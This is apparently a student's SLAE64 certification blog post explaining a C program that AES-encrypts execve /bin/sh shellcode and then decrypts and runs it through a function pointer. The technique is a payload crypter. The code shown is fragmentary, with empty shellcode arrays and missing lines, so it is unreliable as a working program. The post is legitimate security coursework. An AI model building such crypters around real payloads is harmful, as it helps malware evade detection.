AES-256 Encrypted Shellcode

This is my solution to the seventh exam question of the SLAE64 certification. This exercise was to write a program that decrypts shellcode and executes it. Of course, you would also need to encrypt the shellcode somehow first. Any programming language was acceptable.

Since I had already been writing mainly C shellcode runners for this class, and I really never have an excuse to program in C anymore, I chose to use AES encryption in a C program. As any security professional will tell you, it's best to use a trusted crypto (whoah - does crypto mean something other than bitcoin?!?) library rather than attempting to write your own. I used the openssl library for this exercise.

My full program is here:


//encryption utility function declarations
void print_data(const char* label, const void* data, int len);

unsigned char execve_sc[] = \

unsigned char encrypted_execve_sc[] = \

int main(int argc, char *argv[])
    const static unsigned char key[] = {0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32};
    unsigned char iv[AES_BLOCK_SIZE];
    //dumb logic - if any arg is passed, just try encoding and printing execve_sc 
        unsigned char tmp_encrypted_execve_sc[sizeof(encrypted_execve_sc)]; 
        AES_KEY enc_key;
        memset(iv, 0x46, AES_BLOCK_SIZE);
    //otherwise we just go ahead and decrypt

    unsigned char decrypted_execve_sc[sizeof(encrypted_execve_sc)];

    AES_KEY dec_key;
    memset(iv, 0x46, AES_BLOCK_SIZE);

    int (*ret)() = (int(*)())decrypted_execve_sc;



//encryption utility function definitions
void print_data(const char* label, const void* data, int len){
    printf("%s : ", label);
    const unsigned char * p = (const unsigned char*) data;
    int i;

        printf("\\x%02X", *p++);


As you can see - I was pretty sloppy and just threw in an option to encrypt the cleartext if you passed any commmand line argument. I used this originally to print out the encrypted shellcode for execution and just left it as evidence of the process:

enc shellcode

Again, the example shellcode used for this problem was the execve program to spawn /bin/sh.

Other than that, I think the code and API's used are pretty self-explanatory by name. One interesting detail is that the decryption is actually done with the function AES_cbc_encrypt(), which makes sense as AES is a symmetric algorithm.

Running the program prints out the decrypted bytes and gives me a shell once again:

enc shell

All code referenced in this blog post is available at:

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification.

Certification at:

Student ID: SLAE64 - 1546